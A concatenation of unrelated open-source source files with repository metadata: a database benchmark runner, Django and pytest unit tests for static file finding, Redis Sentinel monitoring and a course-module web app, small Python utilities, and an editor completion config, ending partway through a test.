"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 73,
"avg_line_length": 29.61904761904762,
"alnum_prop": 0.5562700964630225,
"repo_name": "ingenieroariel/pinax",
"id": "215b9c1051dc21554fd07b8ff6468ca8cd59b599",
"size": "622",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "fixtures/generate/gen_notification.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3140"
},
{
"name": "Python",
"bytes": "520245"
}
],
"symlink_target": ""
} |
'''
Created on 2015-07-02
@author: mizhon
'''
import os
import time
import subprocess
from ADT.common import CommonActions
from Utility import util
from Logs import logger
log = logger.Log()
def main():
try:
console_args = CommonActions.ca_receive_console_args()
args_tpl = CommonActions.ca_get_console_args(console_args)
action = args_tpl[0]
cfg_file_list = args_tpl[1]
if os.path.exists(util.RESULT_FOLDER):
pass
else:
p = subprocess.Popen(["mkdir", "-p", util.RESULT_FOLDER])
p.wait()
for cfg_file in cfg_file_list:
cmd_list = CommonActions.ca_get_cmds_list(action, cfg_file)
print "CMD_LIST:", cmd_list
for cmd in cmd_list:
log.info(cmd)
result = CommonActions.ca_exec_cmds(cmd)
print result
if CommonActions.tool == util.SYSBENCH:
#SysbenchActions.sa_save_results(result)
pass
elif CommonActions.tool == util.TPCCMYSQL:
#TpccmysqlActions.ta_save_results(result)
pass
'If more than one commands, sleep between each execution'
if len(cmd_list) > 1:
time.sleep(util.SLEEP_TIME)
exit(0)
except Exception as e:
log.error(e)
| {
"content_hash": "5c420acff01b1aca74b196b8a381b348",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 73,
"avg_line_length": 26.464285714285715,
"alnum_prop": 0.5222672064777328,
"repo_name": "mizhon/tools",
"id": "94084e61a5afe630fcef3d72c43a6685d2c93cd6",
"size": "1528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autodbperftool/ADT/adt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19819"
}
],
"symlink_target": ""
} |
import os
import unittest
from tethys_apps.static_finders import TethysStaticFinder
class TestTethysStaticFinder(unittest.TestCase):
def setUp(self):
self.src_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
self.root = os.path.join(self.src_dir, 'tests', 'apps', 'tethysapp-test_app',
'tethysapp', 'test_app', 'public')
def tearDown(self):
pass
def test_init(self):
pass
def test_find(self):
tethys_static_finder = TethysStaticFinder()
path = 'test_app/css/main.css'
ret = tethys_static_finder.find(path)
self.assertEqual(os.path.join(self.root, 'css/main.css'), ret)
def test_find_all(self):
tethys_static_finder = TethysStaticFinder()
path = 'test_app/css/main.css'
ret = tethys_static_finder.find(path, all=True)
self.assertIn(os.path.join(self.root, 'css/main.css'), ret)
def test_find_location_with_no_prefix(self):
prefix = None
path = 'css/main.css'
tethys_static_finder = TethysStaticFinder()
ret = tethys_static_finder.find_location(self.root, path, prefix)
self.assertEqual(os.path.join(self.root, path), ret)
def test_find_location_with_prefix_not_in_path(self):
prefix = 'tethys_app'
path = 'css/main.css'
tethys_static_finder = TethysStaticFinder()
ret = tethys_static_finder.find_location(self.root, path, prefix)
self.assertIsNone(ret)
def test_find_location_with_prefix_in_path(self):
prefix = 'tethys_app'
path = 'tethys_app/css/main.css'
tethys_static_finder = TethysStaticFinder()
ret = tethys_static_finder.find_location(self.root, path, prefix)
self.assertEqual(os.path.join(self.root, 'css/main.css'), ret)
def test_list(self):
tethys_static_finder = TethysStaticFinder()
expected_ignore_patterns = ''
expected_app_paths = []
for path, storage in tethys_static_finder.list(expected_ignore_patterns):
if 'test_app' in storage.location:
expected_app_paths.append(path)
self.assertIn('js/main.js', expected_app_paths)
self.assertIn('images/icon.gif', expected_app_paths)
self.assertIn('css/main.css', expected_app_paths)
| {
"content_hash": "cc06e66391b137255eeaf527e3c3f7a5",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 99,
"avg_line_length": 35.23880597014925,
"alnum_prop": 0.6340533672172808,
"repo_name": "CI-WATER/tethys",
"id": "ea0bb1a414e3fb30af58b9a192adf729e36356e2",
"size": "2361",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit_tests/test_tethys_apps/test_static_finders.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "175789"
},
{
"name": "HTML",
"bytes": "149728"
},
{
"name": "JavaScript",
"bytes": "360375"
},
{
"name": "Python",
"bytes": "592551"
}
],
"symlink_target": ""
} |
import mock
import pytest
from datadog_checks.base import ConfigurationError
from datadog_checks.redis_sentinel import RedisSentinelCheck
METRICS = [
'redis.sentinel.odown_slaves',
'redis.sentinel.sdown_slaves',
'redis.sentinel.ok_slaves',
'redis.sentinel.ok_sentinels',
'redis.sentinel.known_sentinels',
'redis.sentinel.known_slaves',
'redis.sentinel.link_pending_commands',
]
SERVICE_CHECKS = [
'redis.sentinel.master_is_disconnected',
'redis.sentinel.master_is_down',
'redis.sentinel.slave_is_disconnected',
'redis.sentinel.slave_master_link_down',
]
CHECK_NAME = 'redis_sentinel'
@pytest.mark.unit
def test_load_config():
instance = {}
c = RedisSentinelCheck('redis_sentinel', {}, instance)
# Error on empty instance
with pytest.raises(ConfigurationError):
c._load_config(instance)
# When sentinel_port is not set.
with pytest.raises(ConfigurationError):
c._load_config({'sentinel_host': 'localhost'})
# When sentinel_port is a float.
with pytest.raises(ConfigurationError):
c._load_config({'sentinel_host': 'localhost', 'sentinel_port': 123.0})
# When sentinel_port is a string
with pytest.raises(ConfigurationError):
c._load_config({'sentinel_host': 'localhost', 'sentinel_port': 'port'})
# Expect to pass when port is an integer, with no password defined.
host, port, password = c._load_config({'sentinel_host': 'localhost', 'sentinel_port': 123, 'masters': 'mymaster'})
assert host == 'localhost'
assert port == 123
assert password is None
# Expect to pass when port is an integer, with password defined.
host, port, password = c._load_config(
{'sentinel_host': 'localhost', 'sentinel_port': 123, 'masters': 'mymaster', 'sentinel_password': 'password1'}
)
assert host == 'localhost'
assert port == 123
assert password == 'password1'
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_check(aggregator, instance):
"""
Testing Redis_sentinel check.
"""
check = RedisSentinelCheck(CHECK_NAME, {}, {})
check.check(instance)
for mname in METRICS:
aggregator.assert_metric(mname, at_least=1)
for svc_chk in SERVICE_CHECKS:
aggregator.assert_service_check(svc_chk, status=RedisSentinelCheck.OK, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_down_slaves(aggregator, instance):
"""
Testing Redis_sentinel check.
"""
check = RedisSentinelCheck(CHECK_NAME, {}, {})
sentinel_slaves = []
for _ in range(5):
sentinel_slaves.append({'is_odown': True, 'is_sdown': False})
for _ in range(7):
sentinel_slaves.append({'is_odown': False, 'is_sdown': True})
with mock.patch('redis.StrictRedis.sentinel_slaves', return_value=sentinel_slaves):
check.check(instance)
aggregator.assert_metric('redis.sentinel.odown_slaves', 5)
aggregator.assert_metric('redis.sentinel.sdown_slaves', 7)
| {
"content_hash": "59c0de3df59bc46cd32525ef4828ff50",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 118,
"avg_line_length": 31.161616161616163,
"alnum_prop": 0.6774716369529984,
"repo_name": "DataDog/integrations-extras",
"id": "703152be9b964a6d51e28aa63537dcbf4eaca1c3",
"size": "3085",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "redis_sentinel/tests/test_redis_sentinel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "4265"
},
{
"name": "Go",
"bytes": "4119"
},
{
"name": "PHP",
"bytes": "3192"
},
{
"name": "Python",
"bytes": "1219552"
},
{
"name": "Ruby",
"bytes": "8005"
},
{
"name": "Shell",
"bytes": "4237"
}
],
"symlink_target": ""
} |
from .. import settings
from copy import copy
def _get_group_id_by_name(group_name, connection):
group = connection.getObject('ExperimenterGroup', attributes={'name': group_name})
if group:
return group.id
else:
return None
def _get_current_group_id(connection):
return connection.getGroupFromContext().id
def switch_to_default_search_group(connection):
if settings.DEFAULT_SEARCH_GROUP:
group_id = _get_group_id_by_name(settings.DEFAULT_SEARCH_GROUP, connection)
if group_id and (group_id != _get_current_group_id(connection)):
connection.setGroupForSession(group_id)
def _adapt_ellipse_roi(roi_json):
new_json = copy(roi_json)
try:
new_json['cx'] = new_json.pop('x')
new_json['cy'] = new_json.pop('y')
new_json['rx'] = new_json.pop('radiusX')
new_json['ry'] = new_json.pop('radiusY')
except KeyError:
pass
return new_json
def adapt_rois_json(rois):
adapted_rois = list()
for r in rois:
if r['type'] == 'Ellipse':
adapted_rois.append(_adapt_ellipse_roi(r))
else:
adapted_rois.append(r)
return adapted_rois
| {
"content_hash": "a74101a924965cabbe225698d3ba9dd0",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 86,
"avg_line_length": 27.651162790697676,
"alnum_prop": 0.6274179983179142,
"repo_name": "crs4/ome_seadragon",
"id": "f2c7dbd547b58e9a0fcd2906d95cd248d868a7d7",
"size": "2287",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "ome_data/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "108694"
},
{
"name": "JavaScript",
"bytes": "139137"
},
{
"name": "Python",
"bytes": "169825"
},
{
"name": "Shell",
"bytes": "4176"
}
],
"symlink_target": ""
} |
from gzip import open as gzip_open
from shutil import copyfileobj, move
from Bio.bgzf import open as bgzf_open
def gzip_decompress_and_bgzip_compress_file(gzip_file_path):
with gzip_open(gzip_file_path) as gzip_file:
bgzip_file_path = gzip_file_path
bgzip_file_path_temporary = "{}.temporary".format(bgzip_file_path)
with bgzf_open(bgzip_file_path_temporary, mode="wb") as bgzip_file_temporary:
copyfileobj(gzip_file, bgzip_file_temporary)
move(bgzip_file_path_temporary, bgzip_file_path)
return bgzip_file_path
| {
"content_hash": "fd9108f0ac74a18db1b11c91eb49df48",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 85,
"avg_line_length": 27.142857142857142,
"alnum_prop": 0.7070175438596491,
"repo_name": "UCSD-CCAL/ccal",
"id": "aeb1971a6ae25fbc73836fe0a80fab9e3751ad64",
"size": "570",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ccal/gzip_decompress_and_bgzip_compress_file.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "20830"
},
{
"name": "Python",
"bytes": "294577"
}
],
"symlink_target": ""
} |
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
# '-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# You 100% do NOT need -DUSE_CLANG_COMPLETER in your flags; only the YCM
# source code needs it.
'-DUSE_CLANG_COMPLETER',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++11',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
# c/c++ include path
'-isystem',
'/usr/include',
'-isystem',
'/usr/local/include',
'-isystem',
'/usr/include/c++/4.8',
'-isystem',
'/usr/include/c++/4.8.5',
'-isystem',
'/usr/include/c++/4.9.3',
'-isystem',
'/usr/include/c++/5',
'-isystem',
'/usr/include/c++/5.1',
'-isystem',
'/usr/include/c++/5.2',
'-isystem',
'/usr/include/c++/5.3',
'-isystem',
'/usr/include/c++/6',
'-isystem',
'/usr/include/c++/6.1',
# 3rdParty include path
'-isystem',
'/usr/local/3rdParty/boost/include',
'-isystem',
'/usr/local/3rdParty/log4cpp/include',
'-isystem',
'/usr/local/3rdParty/thrift/include',
'-isystem',
'/usr/local/3rdParty/RCF/include',
'-isystem',
'/usr/local/3rdParty/zeromq/include',
'-isystem',
'/usr/local/3rdParty/ssl/include',
'-isystem',
'/usr/local/3rdParty/uuid/include',
# project include path
'-isystem',
'../include',
'-isystem',
'./MessageDef',
#'-isystem',
# This path will only work on OS X, but extra paths that don't exist are not
# harmful
#'/System/Library/Frameworks/Python.framework/Headers',
#'-isystem',
#'../llvm/include',
#'-isystem',
#'../llvm/tools/clang/include',
#'-I',
#'.',
#'-I',
#'./ClangCompleter',
#'-isystem',
#'./tests/gmock/gtest',
#'-isystem',
#'./tests/gmock/gtest/include',
#'-isystem',
#'./tests/gmock',
#'-isystem',
#'./tests/gmock/include',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
| {
"content_hash": "f3fc80c1d8ae5a37c04c69eb0c0f6289",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 80,
"avg_line_length": 28.635467980295566,
"alnum_prop": 0.675038706347841,
"repo_name": "chxuan/samples",
"id": "aba10f84d0e813a3d4d062e30ac7f0f6a4f1c9f4",
"size": "7213",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "framework/net-rcf/tests/.ycm_extra_conf.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2991"
},
{
"name": "C++",
"bytes": "1582151"
},
{
"name": "CMake",
"bytes": "32195"
},
{
"name": "Python",
"bytes": "69341"
},
{
"name": "Shell",
"bytes": "4139"
},
{
"name": "Thrift",
"bytes": "73"
}
],
"symlink_target": ""
} |
from datetime import datetime
import sys
import time
import sqlite3
import hashlib
#TODO: make this as class
#class Utils:
pythonV2 = sys.version_info[0] == 2
DEBUG=True
DEBUG_FILE="debug.log"
ERROR_FILE="error.log"
def debug(str):
if DEBUG:
msg="%s: %s" % (datetime.now(),str)
if DEBUG_FILE is not None:
file=open(DEBUG_FILE,"a")
file.write("%s\n" % msg)
file.close()
#print msg
def prompt(str):
if pythonV2:
inputStr = raw_input(str)
else:
inputStr = input(str)
inputStr=unicode(inputStr,"UTF-8")
return inputStr
def boolValue(value):
string=str(value)
return string.lower() in ("yes","y","true", "on", "t", "1")
def error():
import traceback
str=traceback.format_exc()
print(str)
msg="%s: %s" % (datetime.now(),str)
appendToFile(ERROR_FILE,msg)
def appendToFile(filename, lines=[]):
for line in lines:
appendToFile(filename,line)
def appendToFile(filename, str):
file=open(filename,"a")
file.write(str)
file.write("\n")
file.close()
def appendToLogFile(str):
file=open("mazingame_log.txt","a")
file.write(str)
file.write("\n")
file.close()
def readFileAsString(filename):
file=open(filename,"r")
lines=[]
for line in file:
lines.append(line)
file.close()
return "".join(lines)
def sha256(str):
sha=hashlib.sha256(str)
return sha.hexdigest()
def currentDate():
cTime=currentTimestamp()
return datetime.fromtimestamp(cTime).strftime('%Y-%m-%d')
def currentTimeMillis():
return int(round(time.time() * 1000))
def currentTimestamp():
return time.time()
def formatTimestamp(timestamp):
return datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S')
def currentTimeISO8601():
"""Return current time as ISO8601 timestamp YYYY-MM-DD HH:MM:SS.SSS"""
return datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
#SQLITE
def openDatabase(file,inMemory=False):
"""Open SQLite db and return tuple (connection,cursor)"""
if inMemory==True:
conn=sqlite3.connect(':memory:')
else:
conn=sqlite3.connect(file)
conn.row_factory = sqlite3.Row
cursor=conn.cursor()
return (conn,cursor)
def closeDatabase(connection):
"""Close SQLite db connection"""
if connection is not None:
connection.close()
| {
"content_hash": "f426ab957be07637a55312c37301ac99",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 74,
"avg_line_length": 22.660377358490567,
"alnum_prop": 0.6353039134054954,
"repo_name": "samisalkosuo/mazingame",
"id": "99e548822a640b6cb70d8730d9ab243affe6efc9",
"size": "3548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mazingame/utils/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "46296"
},
{
"name": "Shell",
"bytes": "521"
}
],
"symlink_target": ""
} |
import datetime
from django.test import TestCase
from django.urls.base import reverse
from mock import patch
from oauthlib.common import generate_token
from bridge_lti.models import LtiContentSource, LtiLmsPlatform
from module.mixins.views import GroupEditFormMixin
from module.models import (
Activity, BridgeUser, Collection, CollectionOrder, ContributorPermission, Engine, GradingPolicy, ModuleGroup
)
GRADING_POLICIES = (
# value, display_name
('trials_count', 'Trials count', ),
('points_earned', 'Points earned',),
)
class BridgeTestCase(TestCase):
fixtures = ['gradingpolicy', 'engine', 'api', 'bridge']
group_prefix = GroupEditFormMixin.prefix
grading_prefix = GroupEditFormMixin.grading_prefix
def add_prefix(self, prefix='', data=None):
"""Add prefix to form data dict, which will be send as POST or GET to view."""
data = data or {}
return {"{}-{}".format(prefix, k): v for k, v in data.items()}
@patch('module.tasks.sync_collection_engines.apply_async')
def setUp(self, mock_apply_async):
self.user = BridgeUser.objects.create_user(
username='test',
password='test',
email='test@me.com'
)
self.client.login(username='test', password='test')
# collections
self.collection1 = Collection.objects.create(name='col1', owner=self.user)
self.collection2 = Collection.objects.create(name='col2', owner=self.user)
self.collection3 = Collection.objects.create(name='col3', owner=self.user)
# grading policies
self.trials_count = GradingPolicy.objects.get(name='trials_count')
self.points_earned = GradingPolicy.objects.get(name='points_earned')
self.engine = Engine.objects.create(engine='engine_mock', engine_name='mockEngine')
self.test_cg = ModuleGroup.objects.create(name='TestColGroup', owner=self.user)
self.collection_order1 = CollectionOrder.objects.create(
slug="collection_order1",
group=self.test_cg,
collection=self.collection1,
engine=self.engine,
grading_policy=self.points_earned
)
self.collection_order3 = CollectionOrder.objects.create(
slug="collection_order3",
group=self.test_cg,
collection=self.collection3,
engine=self.engine,
grading_policy=self.trials_count
)
self.group_update_data = {
'name': "CG2",
'owner': self.user.id,
'description': 'Some description for a group',
}
self.group_post_data = self.add_prefix(self.group_prefix, self.group_update_data)
# LtiLmsPlatform
self.lti_lms_platform = LtiLmsPlatform.objects.create(
consumer_name='consumer_name',
# This method generates a valid consumer_key.
# The valid consumer_key is used in the test for checking LTI query.
consumer_key=generate_token(length=25),
consumer_secret='consumer_secret',
expiration_date=datetime.datetime.today() + datetime.timedelta(days=1),
lms_metadata='lms_metadata'
)
class TestCollectionList(BridgeTestCase):
def test_without_group_slug(self):
"""Test collection list view without group slug."""
url = reverse('module:collection-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_with_group_id(self):
"""Test collection list view with group slug."""
url = reverse('module:collection-list', kwargs={'group_slug': self.test_cg.slug})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
class TestCollectionGroup(BridgeTestCase):
def test_create_cg_page_works(self):
"""Test that ModuleGroup page works correctly contain valid context and response code is 200."""
url = reverse('module:group-add')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
groups_count = ModuleGroup.objects.count()
policy_data = {'name': self.trials_count.name}
data = {}
data.update(self.group_post_data)
data.update(policy_data)
response = self.client.post(url, data=data)
self.assertEqual(ModuleGroup.objects.count(), groups_count + 1)
self.assertEqual(response.status_code, 202)
self.assertEqual(response.content, b'{"status": "ok"}')
def test_cg_list(self):
"""Test ModuleGroup list page. Check that response code is 200, `groups` is in context and is not empty."""
url = reverse('module:group-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn('groups', response.context)
self.assertIsNotNone(response.context['groups'])
self.assertEqual(
list(response.context['groups'].values_list('id', flat=True)),
list(ModuleGroup.objects.filter(owner=self.user).values_list('id', flat=True))
)
def test_update_cg(self):
"""Test update ModuleGroup page, check that updated collection group is really updated."""
groups_count = ModuleGroup.objects.count()
url = reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
response = self.client.post(url, data=self.group_update_data)
if response.status_code == 200:
print((dict(response.context['form'].errors)))
self.assertEqual(groups_count, ModuleGroup.objects.count())
test_g = ModuleGroup.objects.get(id=self.test_cg.id)
self.assertEqual(test_g.name, self.group_update_data['name'])
self.assertEqual(test_g.description, self.group_update_data['description'])
self.assertNotEqual(test_g.name, self.test_cg.name)
self.assertNotEqual(test_g.description, self.test_cg.description)
self.assertNotEqual(test_g.collections.all(), self.test_cg.collections.all())
class CollectionGroupEditGradingPolicyTest(BridgeTestCase):
def check_group_change_page(self):
url = reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
def check_update_group(self, data):
url = reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug})
self.client.post(url, data=data)
self.test_cg = ModuleGroup.objects.get(id=self.test_cg.id)
self.assertEqual(self.group_update_data['name'], self.test_cg.name)
class TestCollectionGroupCollectionOrder(BridgeTestCase):
def test_group_collection_add(self):
"""
Test updated collection group contains all new collections.
"""
data = {
"collection_group-slug": "second",
"collection_group-collection": self.collection2.id,
"collection_group-engine": self.engine.id,
"collection_group-grading_policy_name": "trials_count",
"grading-name": "trials_count"
}
# Group is updated with three collections two of which is repeated. Collections will increase by 1
expected_collections_count = self.test_cg.collections.count() + 1
url = reverse('module:collection-order-add', kwargs={'group_slug': self.test_cg.slug})
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 202)
self.assertEqual(self.test_cg.collections.count(), expected_collections_count)
def test_group_collection_update(self):
"""
Test updated collection group contains all new collections.
"""
data = {
"collection_group-slug": self.collection_order1.slug,
"collection_group-collection": self.collection1.id,
"collection_group-engine": self.engine.id,
"collection_group-grading_policy_name": "trials_count",
"grading-name": "trials_count"
}
# Group is updated with three collections two of which is repeated. Collections will increase by 1
url = reverse('module:collection-order-change', kwargs={
'collection_order_slug': self.collection_order1.slug,
})
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 202)
self.assertEqual(
CollectionOrder.objects.get(id=self.collection_order1.id).grading_policy.name, "trials_count"
)
def test_group_collection_not_valid_update(self):
"""
Test updated collection group contains all new collections.
"""
data = {
"collection_group-slug": self.collection_order1.slug,
"collection_group-collection": self.collection1.id,
"collection_group-engine": self.engine.id,
"collection_group-grading_policy_name": "wrong_grading",
"grading-name": "wrong_grading"
}
# Group is updated with three collections two of which is repeated. Collections will increase by 1
url = reverse('module:collection-order-change', kwargs={
'collection_order_slug': self.collection_order1.slug
})
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.context['form'].errors,
{
'grading_policy_name': [
'Select a valid choice. wrong_grading is not one of the available choices.',
'Not correct policy'
]
}
)
def test_cg_with_not_correct_policy_engine_pair(self):
"""
Try to create collectiongroup with not correct pair of policy and engine.
Not correct pair example - engine graded policy with mock engine.
In this case it should return 200, and context['form'] should contain errors.
"""
data = {
"collection_group-slug": self.collection_order1.slug,
"collection_group-collection": self.collection1.id,
"collection_group-engine": self.engine.id,
"collection_group-grading_policy_name": "engine_grade",
}
url = reverse('module:collection-order-change', kwargs={
'collection_order_slug': self.collection_order1.slug
})
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
self.assertEqual(
response.context['form'].errors,
{
'engine': ["This Engine doesn't support chosen Policy. Please choose another policy or engine."],
'grading_policy_name': [('This policy can be used only with VPAL engine(s). '
'Choose another policy or engine.')]
}
)
def test_group_collection_remove(self):
"""
Test updated collection group doesn't contain old collections.
"""
data = [col_order for col_order, grade_update_available in self.test_cg.ordered_collections]
expected_group_collection = len(data) - 1
# Group is updated with one collection all existing should be removed.
url = reverse(
'module:collection-group-delete',
kwargs={'collection_order_slug': self.collection_order1.slug}
)
response = self.client.post(url)
self.assertEqual(response.status_code, 302)
self.assertEqual(len([x for x in self.test_cg.ordered_collections]), expected_group_collection)
def test_group_collection_reordered(self):
"""
Test collections are reordered in the group on move to different positions command.
"""
data = {
"collection_group-slug": "second",
"collection_group-collection": self.collection2.id,
"collection_group-engine": self.engine.id,
"collection_group-grading_policy_name": "trials_count",
"grading-name": "trials_count"
}
url = reverse('module:collection-order-add', kwargs={'group_slug': self.test_cg.slug})
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 202)
ordered_collections = [col_order for col_order, grade_update_available in self.test_cg.ordered_collections]
expected_collection_order = [ordered_collections[2], ordered_collections[1], ordered_collections[0]]
# Moving collection3 up, collection1 down and get reordered result as (collection3, collection2, collection1)
move_to_index_0 = reverse('module:collection-move', kwargs={
'collection_order_slug': ordered_collections[2].slug,
'order': 0,
})
response_up = self.client.get(move_to_index_0)
self.assertEqual(response_up.status_code, 201)
move_to_index_2 = reverse('module:collection-move', kwargs={
'collection_order_slug': ordered_collections[0].slug,
'order': 2,
})
response_down = self.client.get(move_to_index_2)
self.assertEqual(response_down.status_code, 201)
ordered_collections = [col_order for col_order, grade_update_available in self.test_cg.ordered_collections]
self.assertEqual(ordered_collections, expected_collection_order)
def test_get_grading_policy_form(self):
"""Test that form is present in response context for both grading policies."""
policies = GRADING_POLICIES
for policy, _ in policies:
url = reverse('module:grading_policy_form', kwargs={
"collection_order_slug": self.collection_order1.slug
}) + "?grading_policy={}".format(policy)
response = self.client.get(url)
self.assertIn('form', response.context)
def test_get_not_valid_grading_policy_form(self):
"""Check that if not correct grading policy passed - no form return."""
url = reverse('module:grading_policy_form', kwargs={
"collection_order_slug": self.collection_order1.slug
}) + "?grading_policy={}".format('some_policy')
response = self.client.get(url)
self.assertNotIn('form', response.context)
class TestBackURLMixin(BridgeTestCase):
def setUp(self):
super().setUp()
self.back_url = '/test_back_url/'
def test_collection_edit_back_url(self):
"""Test back_url param is added into context in collection change view."""
url = (
reverse('module:collection-change', kwargs={'slug': self.collection1.slug}) +
'?back_url={}'.format(self.back_url)
)
change_response = self.client.get(url)
self.assertIn('back_url', change_response.context)
self.assertEqual(change_response.context['back_url'], self.back_url)
@patch('module.views.get_available_courses', return_value=([], []))
def test_collection_detail_back_url(self, available_course_mock):
"""Test back_url param is added into context navigation from collection detail view."""
url_detail = (
reverse('module:collection-detail', kwargs={'slug': self.collection1.slug}) +
'?back_url={}'.format(self.back_url)
)
detail_response = self.client.get(url_detail)
self.assertIn('back_url', detail_response.context)
self.assertEqual(detail_response.context['back_url'], self.back_url)
def test_collectiongroup_edit_back_url(self):
"""Test back_url param is added into context navigation from collectiongroup edit view."""
change_url = (
reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug}) +
'?back_url={}'.format(self.back_url)
)
change_response = self.client.get(change_url)
self.assertIn('back_url', change_response.context)
self.assertEqual(change_response.context['back_url'], self.back_url)
def test_collectiongroup_detail_back_url(self):
"""Test back_url param is added into context navigation from collectiongroup detail view."""
url = (
reverse('module:group-detail', kwargs={'group_slug': self.test_cg.slug}) +
'?back_url={}'.format(self.back_url)
)
detail_response = self.client.get(url)
